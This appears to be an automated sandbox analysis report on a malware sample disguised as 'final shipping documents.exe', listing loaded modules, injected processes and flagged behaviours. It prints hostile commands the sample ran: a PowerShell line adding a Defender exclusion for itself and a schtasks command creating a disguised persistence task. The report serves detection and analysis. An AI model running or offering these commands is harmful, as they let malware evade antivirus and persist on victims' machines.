Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: ninput.dll
Source: C:\Windows\explorer.exe	Section loaded: appresolver.dll
Source: C:\Windows\explorer.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\explorer.exe	Section loaded: slc.dll
Source: C:\Windows\explorer.exe	Section loaded: sppc.dll
Source: C:\Windows\explorer.exe	Section loaded: profapi.dll
Source: C:\Windows\explorer.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: starttiledata.dll
Source: C:\Windows\explorer.exe	Section loaded: idstore.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\explorer.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\explorer.exe	Section loaded: wlidprov.dll
Source: C:\Windows\explorer.exe	Section loaded: samcli.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.applicationmodel.dll
Source: C:\Windows\explorer.exe	Section loaded: usermgrproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\explorer.exe	Section loaded: policymanager.dll
Source: C:\Windows\explorer.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.dll
Source: C:\Windows\explorer.exe	Section loaded: winsta.dll
Source: C:\Windows\explorer.exe	Section loaded: sndvolsso.dll
Source: C:\Windows\explorer.exe	Section loaded: mmdevapi.dll
Source: C:\Windows\explorer.exe	Section loaded: devobj.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryclient.dll
Source: C:\Windows\explorer.exe	Section loaded: appextension.dll
Source: C:\Windows\explorer.exe	Section loaded: oleacc.dll
Source: C:\Windows\explorer.exe	Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe	Section loaded: textshaping.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.dll
Source: C:\Windows\explorer.exe	Section loaded: windowmanagementapi.dll
Source: C:\Windows\explorer.exe	Section loaded: textinputframework.dll
Source: C:\Windows\explorer.exe	Section loaded: inputhost.dll
Source: C:\Windows\explorer.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe	Section loaded: dcomp.dll
Source: C:\Windows\explorer.exe	Section loaded: d3d11.dll
Source: C:\Windows\explorer.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\explorer.exe	Section loaded: dxcore.dll
Source: C:\Windows\explorer.exe	Section loaded: d2d1.dll
Source: C:\Windows\explorer.exe	Section loaded: dwrite.dll
Source: C:\Windows\explorer.exe	Section loaded: xmllite.dll
Source: C:\Windows\explorer.exe	Section loaded: cldapi.dll
Source: C:\Windows\explorer.exe	Section loaded: fltlib.dll
Source: C:\Windows\explorer.exe	Section loaded: dataexchange.dll
Source: C:\Windows\explorer.exe	Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe	Section loaded: tiledatarepository.dll
Source: C:\Windows\explorer.exe	Section loaded: staterepository.core.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepository.dll
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\explorer.exe	Section loaded: mrmcorer.dll
Source: C:\Windows\explorer.exe	Section loaded: languageoverlayutil.dll
Source: C:\Windows\explorer.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\explorer.exe	Section loaded: thumbcache.dll
Source: C:\Windows\explorer.exe	Section loaded: edputil.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.pcshell.dll
Source: C:\Windows\explorer.exe	Section loaded: wkscli.dll
Source: C:\Windows\explorer.exe	Section loaded: wincorlib.dll
Source: C:\Windows\explorer.exe	Section loaded: cdp.dll
Source: C:\Windows\explorer.exe	Section loaded: dsreg.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.immersiveshell.serviceprovider.dll
Source: C:\Windows\explorer.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: photometadatahandler.dll
Source: C:\Windows\explorer.exe	Section loaded: ntshrui.dll
Source: C:\Windows\explorer.exe	Section loaded: cscapi.dll
Source: C:\Windows\explorer.exe	Section loaded: linkinfo.dll
Source: C:\Windows\explorer.exe	Section loaded: ehstorshell.dll
Source: C:\Windows\explorer.exe	Section loaded: cscui.dll
Source: C:\Windows\explorer.exe	Section loaded: iconcodecservice.dll
Source: C:\Windows\explorer.exe	Section loaded: provsvc.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.dll
Source: C:\Windows\explorer.exe	Section loaded: pdh.dll
Source: C:\Windows\explorer.exe	Section loaded: applicationframe.dll
Source: C:\Windows\explorer.exe	Section loaded: rmclient.dll
Source: C:\Windows\explorer.exe	Section loaded: holographicextensions.dll
Source: C:\Windows\explorer.exe	Section loaded: virtualmonitormanager.dll
Source: C:\Windows\explorer.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.immersive.dll
Source: C:\Windows\explorer.exe	Section loaded: abovelockapphost.dll
Source: C:\Windows\explorer.exe	Section loaded: npsm.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.shell.bluelightreduction.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.web.dll
Source: C:\Windows\explorer.exe	Section loaded: mscms.dll
Source: C:\Windows\explorer.exe	Section loaded: coloradapterclient.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.signals.dll
Source: C:\Windows\explorer.exe	Section loaded: tdh.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositorybroker.dll
Source: C:\Windows\explorer.exe	Section loaded: mfplat.dll
Source: C:\Windows\explorer.exe	Section loaded: rtworkq.dll
Source: C:\Windows\explorer.exe	Section loaded: taskflowdataengine.dll
Source: C:\Windows\explorer.exe	Section loaded: actxprxy.dll
Source: C:\Windows\explorer.exe	Section loaded: structuredquery.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.security.authentication.web.core.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.data.activities.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.system.launcher.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.ui.shell.windowtabmanager.dll
Source: C:\Windows\explorer.exe	Section loaded: notificationcontrollerps.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.globalization.dll
Source: C:\Windows\explorer.exe	Section loaded: icu.dll
Source: C:\Windows\explorer.exe	Section loaded: mswb7.dll
Source: C:\Windows\explorer.exe	Section loaded: devdispitemprovider.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\explorer.exe	Section loaded: uianimation.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.core.textinput.dll
Source: C:\Windows\explorer.exe	Section loaded: windowsudk.shellcommon.dll
Source: C:\Windows\explorer.exe	Section loaded: dictationmanager.dll
Source: C:\Windows\explorer.exe	Section loaded: npmproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: stobject.dll
Source: C:\Windows\explorer.exe	Section loaded: wmiclnt.dll
Source: C:\Windows\explorer.exe	Section loaded: workfoldersshell.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe	Section loaded: winnsi.dll
Source: C:\Windows\explorer.exe	Section loaded: dpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: msasn1.dll
Source: C:\Windows\explorer.exe	Section loaded: rsaenh.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe	Section loaded: schannel.dll
Source: C:\Windows\explorer.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\explorer.exe	Section loaded: ntasn1.dll
Source: C:\Windows\explorer.exe	Section loaded: ncrypt.dll
Source: C:\Windows\explorer.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\explorer.exe	Section loaded: gpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: pcshellcommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptngc.dll
Source: C:\Windows\explorer.exe	Section loaded: cflapi.dll
Source: C:\Windows\explorer.exe	Section loaded: shellcommoncommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: daxexec.dll
Source: C:\Windows\explorer.exe	Section loaded: container.dll
Source: C:\Windows\explorer.exe	Section loaded: uiautomationcore.dll
Source: C:\Windows\explorer.exe	Section loaded: samlib.dll
Source: C:\Windows\explorer.exe	Section loaded: capabilityaccessmanagerclient.dll
Source: C:\Windows\explorer.exe	Section loaded: batmeter.dll
Source: C:\Windows\explorer.exe	Section loaded: sxs.dll
Source: C:\Windows\explorer.exe	Section loaded: inputswitch.dll
Source: C:\Windows\explorer.exe	Section loaded: es.dll
Source: C:\Windows\explorer.exe	Section loaded: prnfldr.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.shell.dll
Source: C:\Windows\explorer.exe	Section loaded: wpnclient.dll
Source: C:\Windows\explorer.exe	Section loaded: dxp.dll
Source: C:\Windows\explorer.exe	Section loaded: shdocvw.dll
Source: C:\Windows\explorer.exe	Section loaded: syncreg.dll
Source: C:\Windows\explorer.exe	Section loaded: atlthunk.dll
Source: C:\Windows\explorer.exe	Section loaded: actioncenter.dll
Source: C:\Windows\explorer.exe	Section loaded: wevtapi.dll
Source: C:\Windows\explorer.exe	Section loaded: audioses.dll
Source: C:\Windows\explorer.exe	Section loaded: storageusage.dll
Source: C:\Windows\explorer.exe	Section loaded: wer.dll
Source: C:\Windows\explorer.exe	Section loaded: wscinterop.dll
Source: C:\Windows\explorer.exe	Section loaded: wscapi.dll
Source: C:\Windows\explorer.exe	Section loaded: dusmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: pnidui.dll
Source: C:\Windows\explorer.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\explorer.exe	Section loaded: netprofm.dll
Source: C:\Windows\explorer.exe	Section loaded: networkuxbroker.dll
Source: C:\Windows\explorer.exe	Section loaded: ethernetmediamanager.dll
Source: C:\Windows\explorer.exe	Section loaded: werconcpl.dll
Source: C:\Windows\explorer.exe	Section loaded: framedynos.dll
Source: C:\Windows\explorer.exe	Section loaded: hcproviders.dll
Source: C:\Windows\explorer.exe	Section loaded: wlanapi.dll
Source: C:\Windows\explorer.exe	Section loaded: ncsi.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe	Section loaded: wpdshserviceobj.dll
Source: C:\Windows\explorer.exe	Section loaded: portabledevicetypes.dll
Source: C:\Windows\explorer.exe	Section loaded: portabledeviceapi.dll
Source: C:\Windows\explorer.exe	Section loaded: cscobj.dll
Source: C:\Windows\explorer.exe	Section loaded: srchadmin.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.search.dll
Source: C:\Windows\explorer.exe	Section loaded: synccenter.dll
Source: C:\Windows\explorer.exe	Section loaded: imapi2.dll
Source: C:\Windows\explorer.exe	Section loaded: ieproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll

Source: C:\Users\user\Desktop\final shipping documents.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\final shipping documents.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: final shipping documents.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: final shipping documents.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: netstat.pdbGCTL source: MSBuild.exe, 0000000F.00000002.1649082152.0000000000C07000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.1648460267.0000000000A90000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000013.00000002.1649299265.00000000004D0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: netstat.pdb source: MSBuild.exe, 0000000F.00000002.1649082152.0000000000C07000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.1648460267.0000000000A90000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000013.00000002.1649299265.00000000004D0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: explorer.exe, 0000000A.00000002.2477562239.00000000112AF000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000010.00000002.2933557794.0000000003296000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000010.00000002.2973345402.00000000053FF000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001A.00000002.3126911212.0000000009ECF000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000010.00000003.1561959030.0000000004B58000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000010.00000002.2972759000.000000000504E000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000010.00000002.2972759000.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000010.00000003.1564305644.0000000004D03000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000013.00000003.1643226406.0000000002A23000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000013.00000003.1635506917.00000000027FC000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000013.00000002.1650033878.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000013.00000002.1650033878.0000000002D6E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000010.00000003.1561959030.0000000004B58000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000010.00000002.2972759000.000000000504E000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000010.00000002.2972759000.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000010.00000003.1564305644.0000000004D03000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000013.00000003.1643226406.0000000002A23000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000013.00000003.1635506917.00000000027FC000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000013.00000002.1650033878.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000013.00000002.1650033878.0000000002D6E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: mstsc.pdbGCTL source: MSBuild.exe, 00000009.00000002.1564565124.0000000003790000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, 00000010.00000002.2827077225.0000000000F70000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: mstsc.pdb source: MSBuild.exe, 00000009.00000002.1564565124.0000000003790000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, 00000010.00000002.2827077225.0000000000F70000.00000040.80000000.00040000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Users\user\Desktop\final shipping documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\final shipping documents.exe"
Source: C:\Users\user\Desktop\final shipping documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\final shipping documents.exe"			Jump to behavior

Source: C:\Users\user\Desktop\final shipping documents.exe	Code function: 0_2_07004236 push dword ptr [ebp+01h]; ret	0_2_0700423B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0041E1FC pushfd ; retf	9_2_0041E1FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_004172AE push ebp; retf	9_2_004172B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0041D475 push eax; ret	9_2_0041D4C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0041D4C2 push eax; ret	9_2_0041D4C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0041D4CB push eax; ret	9_2_0041D532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0041D52C push eax; ret	9_2_0041D532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0041D580 push edx; ret	9_2_0041D957
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A3225F pushad ; ret	9_2_01A327F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A327FA pushad ; ret	9_2_01A327F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A609AD push ecx; mov dword ptr [esp], ecx	9_2_01A609B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A3283D push eax; iretd	9_2_01A32858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A31366 push eax; iretd	9_2_01A31369
Source: C:\Windows\explorer.exe	Code function: 10_2_0E479B02 push esp; retn 0000h	10_2_0E479B03
Source: C:\Windows\explorer.exe	Code function: 10_2_0E479B1E push esp; retn 0000h	10_2_0E479B1F
Source: C:\Windows\explorer.exe	Code function: 10_2_0E4799B5 push esp; retn 0000h	10_2_0E479AE7
Source: C:\Windows\explorer.exe	Code function: 10_2_0E595B1E push esp; retn 0000h	10_2_0E595B1F
Source: C:\Windows\explorer.exe	Code function: 10_2_0E595B02 push esp; retn 0000h	10_2_0E595B03
Source: C:\Windows\explorer.exe	Code function: 10_2_0E5959B5 push esp; retn 0000h	10_2_0E595AE7
Source: C:\Windows\explorer.exe	Code function: 10_2_107E39B5 push esp; retn 0000h	10_2_107E3AE7
Source: C:\Windows\explorer.exe	Code function: 10_2_107E3B1E push esp; retn 0000h	10_2_107E3B1F
Source: C:\Windows\explorer.exe	Code function: 10_2_107E3B02 push esp; retn 0000h	10_2_107E3B03
Source: C:\Windows\explorer.exe	Code function: 10_2_1093A9B5 push esp; retn 0000h	10_2_1093AAE7
Source: C:\Windows\explorer.exe	Code function: 10_2_1093AB1E push esp; retn 0000h	10_2_1093AB1F
Source: C:\Windows\explorer.exe	Code function: 10_2_1093AB02 push esp; retn 0000h	10_2_1093AB03
Source: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	Code function: 11_2_06AD4236 push dword ptr [ebp+01h]; ret	11_2_06AD423B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010909AD push ecx; mov dword ptr [esp], ecx	15_2_010909B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01061368 push eax; iretd	15_2_01061369
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_01061FEC push eax; iretd	15_2_01061FED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_010E7E99 push ecx; ret	15_2_010E7EAC

Source: final shipping documents.exe	Static PE information: section name: .text entropy: 7.700504849845977
Source: GcrdXwPgmZ.exe.0.dr	Static PE information: section name: .text entropy: 7.700504849845977

Source: C:\Users\user\Desktop\final shipping documents.exe

File created: C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\final shipping documents.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GcrdXwPgmZ" /XML "C:\Users\user\AppData\Local\Temp\tmpEBC2.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\final shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
